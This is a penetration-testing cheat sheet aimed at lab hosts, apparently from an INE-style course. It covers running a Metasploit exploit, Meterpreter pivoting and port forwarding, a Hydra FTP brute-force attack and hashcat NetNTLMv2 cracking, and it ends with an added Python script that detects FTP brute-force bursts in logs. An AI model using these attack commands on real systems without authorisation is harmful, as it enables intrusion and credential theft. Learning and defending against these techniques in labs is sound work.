# Most used tools

### Identify and modify exploits

Tools: msfconsole, searchsploit

Usage:

1. Search for an exploit:

```bash
msfconsole -q
search proftpd
```

2. Select an exploit:

```bash
use exploit/...
```

3. Modify the exploit's options:

```bash
show options
set RHOSTS demo.ine.local
set LHOST 192.0.0.1
set LPORT 6789
```

4. Run the exploit:

```bash
run
```

***

### Demonstrate pivoting by adding a route and port forwarding

Tools: autoroute, portfwd

Context: these steps require an existing Meterpreter session.

Usage:

1. Identify our IP in the subnet

```bash
ipconfig
```

2. Run autoroute. If our IP is 10.0.19.197...

```bash
run autoroute -s 10.0.19.0/20
```

3. Scan for new hosts

```bash
background
use auxiliary/scanner/portscan/tcp
set RHOSTS demo2.ine.local
set PORTS 1-100
exploit
```

4. Pivot by port forwarding

```bash
sessions -i <session ID>
portfwd add -l 1234 -p 80 -r <demo2.ine.local IP>
portfwd list
```

5. On our local machine, run:

```bash
nmap -sCV -sS -p 1234 localhost
```

***

### Conduct brute-force password attacks

Tools: Hydra, msfconsole

Usage:

{% code overflow="wrap" %}

```bash
# -L: file of usernames, -P: file of passwords, then the target host and service
hydra -L /usr/share/metasploit-framework/data/wordlists/unix_users.txt -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt demo.ine.local ftp
```

{% endcode %}
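
On the server side, the dictionary attack above shows up as a burst of failed FTP logins from one client, usually across several usernames. The following detection example is added here and is not part of the original page; it assumes vsftpd-style log lines, and the sample log, `detect_bruteforce` and its threshold and window values are constructed for illustration.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample lines in a vsftpd-style format (assumption: adapt LINE_RE to your server).
SAMPLE_LOG = """\
Mon Mar  4 10:15:01 2024 [pid 2101] [root] FAIL LOGIN: Client "192.0.2.10"
Mon Mar  4 10:15:02 2024 [pid 2102] [admin] FAIL LOGIN: Client "192.0.2.10"
Mon Mar  4 10:15:02 2024 [pid 2103] [backup] FAIL LOGIN: Client "192.0.2.10"
Mon Mar  4 10:15:03 2024 [pid 2104] [sysadmin] FAIL LOGIN: Client "192.0.2.10"
Mon Mar  4 10:15:04 2024 [pid 2105] [sysadmin] FAIL LOGIN: Client "192.0.2.10"
Mon Mar  4 10:15:05 2024 [pid 2106] [sysadmin] OK LOGIN: Client "192.0.2.10"
Mon Mar  4 10:20:00 2024 [pid 2110] [alice] FAIL LOGIN: Client "198.51.100.7"
Mon Mar  4 10:20:30 2024 [pid 2111] [alice] OK LOGIN: Client "198.51.100.7"
"""

LINE_RE = re.compile(
    r'^(?P<ts>\w{3} \w{3} [ \d]\d \d\d:\d\d:\d\d \d{4}) \[pid \d+\] '
    r'\[(?P<user>[^\]]*)\] (?P<result>FAIL|OK) LOGIN: Client "(?P<ip>[^"]+)"')

def detect_bruteforce(lines, threshold=5, window=timedelta(seconds=60)):
    """Flag clients with >= threshold failed logins inside a sliding window."""
    recent = defaultdict(deque)  # ip -> failure timestamps still inside the window
    stats = defaultdict(lambda: {"failures": 0, "users": set(),
                                 "flagged": False, "success_after_burst": None})
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # not a login event
        ts = datetime.strptime(m["ts"], "%a %b %d %H:%M:%S %Y")
        s = stats[m["ip"]]
        if m["result"] == "FAIL":
            s["failures"] += 1
            s["users"].add(m["user"])
            q = recent[m["ip"]]
            q.append(ts)
            while ts - q[0] > window:  # drop failures older than the window
                q.popleft()
            if len(q) >= threshold:
                s["flagged"] = True
        elif s["flagged"] and s["success_after_burst"] is None:
            # A success after a burst suggests a guessed credential: rotate it.
            s["success_after_burst"] = m["user"]
    return {ip: s for ip, s in stats.items() if s["flagged"]}

if __name__ == "__main__":
    for ip, s in detect_bruteforce(SAMPLE_LOG.splitlines()).items():
        print(ip, s["failures"], sorted(s["users"]), s["success_after_burst"])
```

A flagged client with a non-empty `success_after_burst` is the case to triage first, since it points to an account whose password was guessed.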

***

### Conduct hash cracking

Tools: hashcat, john

Usage:

```bash
# -m 5600 selects the NetNTLMv2 hash mode; rockyou.txt is the wordlist
hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt
```
